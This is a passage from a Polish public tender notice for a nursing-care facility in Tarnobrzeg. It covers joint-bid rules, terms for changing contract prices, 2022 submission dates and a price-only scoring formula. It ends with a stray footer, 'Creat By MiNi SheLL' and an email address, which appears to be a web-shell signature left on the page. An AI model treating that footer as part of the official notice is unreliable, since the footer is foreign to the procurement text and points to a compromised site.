wspólną.<br/>7. Nie dopuszcza się uczestniczenia któregokolwiek z Wykonawców wspólnie ubiegających<br/>się<br/>o udzielnie zamówienia w więcej niż jednej grupie Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia. Niedopuszczalnym jest również złożenie przez któregokolwiek z<br/>Wykonawców wspólnie ubiegających się o udzielnie zamówienia, równocześnie oferty<br/>indywidualnej oraz w ramach grupy Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>8. Wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę wspólną.<br/>9. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia brak<br/>podstaw wykluczenia z postępowania powinien wykazać każdy z Wykonawców (dotyczy<br/>pkt IV.2).b).<br/>10. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, zapisy<br/>określone w pkt IV.1) c) obowiązują.<br/>11. Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie<br/>wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia<br/>publicznego, kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana cen <br/> 1. Wartość brutto asortymentu nie wzrośnie przez okres obowiązywania umowy, z zastrzeżeniem ust. 2 – 4.<br/> 2. W przypadku zmiany stawki VAT zmianie ulegnie kwota podatku VAT i cena brutto, cena netto pozostanie niezmienna.<br/> 3. Zmiany cen, o których mowa wyżej, mogą nastąpić od daty wejścia w życie stosownych przepisów prawa. Na dokonanie zmiany cen, o których mowa w ust. 2 musi być sporządzony i podpisany przez obie strony aneks.<br/> 4. Każdorazowo przed wprowadzeniem zmiany polegającej na wzroście ceny (wartości brutto), Wykonawca jest obowiązany przedstawić Zamawiającemu uzasadnienie nowych cen, potwierdzone powołaniem się na stosowne przepisy, z których te zmiany wynikają. Zmiana cen polegająca na wzroście może nastąpić po uzyskaniu akceptacji Zamawiającego w formie aneksu do umowy.<br/> 5. Obniżenie cen może nastąpić bez uzasadnienia w każdym czasie i nie wymaga aneksu do umowy.<br/> 6. Zmiana cen może nastąpić również w przypadkach wymienionych niżej:<br/> 1) wprowadzenia do obrotu w okresie realizacji umowy asortymentu równoważnego, przy czym strony ustalą jego cenę jednostkową, która nie może być wyższa niż cena asortymentu uwzględnionego pierwotnie w umowie;<br/> 2) zmiany sposobu konfekcjonowania (wielkości opakowania), przy czym nastąpi przeliczenie ilości na odpowiednią ilość opakowań albo ilości sztuk w opakowaniu oraz proporcjonalnie do zmiany nastąpi korekta ceny opakowania;<br/> 3) wystąpienia braku asortymentu na rynku z przyczyn niezależnych od Wykonawcy (np. zaprzestanie produkcji, wycofania z obrotu) i wówczas istnieje możliwość zastąpienia go asortymentem równoważnym, ale przy cenie nie wyższej niż cena asortymentu wycofanego lub brakującego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-28 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">SPZOZ Zakład Pielęgnacyjno-Opiekuńczy w Tarnobrzegu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-28 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 8. Kryteria oceny ofert i wybór oferty najkorzystniejszej<br/>1) Zamawiający wybiera ofertę najkorzystniejszą na podstawie kryteriów oceny ofert<br/>określonych w SWZ.<br/>2) Kryterium jakim Zamawiający będzie się kierował przy wyborze oferty jest cena.<br/>12<br/>Oznaczenie postępowania: RZ271.1.3.2022<br/>3) Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że zostały złożone oferty o<br/>takiej samej cenie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w<br/>terminie określonym przez Zamawiającego ofert dodatkowych. Wykonawcy, składając oferty<br/>dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w złożonych ofertach.<br/>4) Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującym kryterium:<br/>Cena brutto 100%<br/>Punkty za kryterium dla n – tego Wykonawcy będą obliczane wg wzoru:<br/>a) dla kryterium – cena brutto<br/>Pcn == Cmin ÷ Cn x 100 pkt<br/>gdzie: 1% = 1 pkt<br/>( Pcn) – ilość punktów za cenę dla ocenianego Wykonawcy;<br/>( Cmin) – najniższa cena spośród ocenianych ofert;<br/>( Cn) – cena zawarta w badanej ofercie;<br/>5) Maksymalna możliwa ocena do uzyskania w tym kryterium wynosi 100 pkt.<br/>6) Zamawiający wybierze spośród ważnych ofert ofertę z najwyższą liczbą punktów.

Creat By MiNi SheLL
Email: jattceo@gmail.com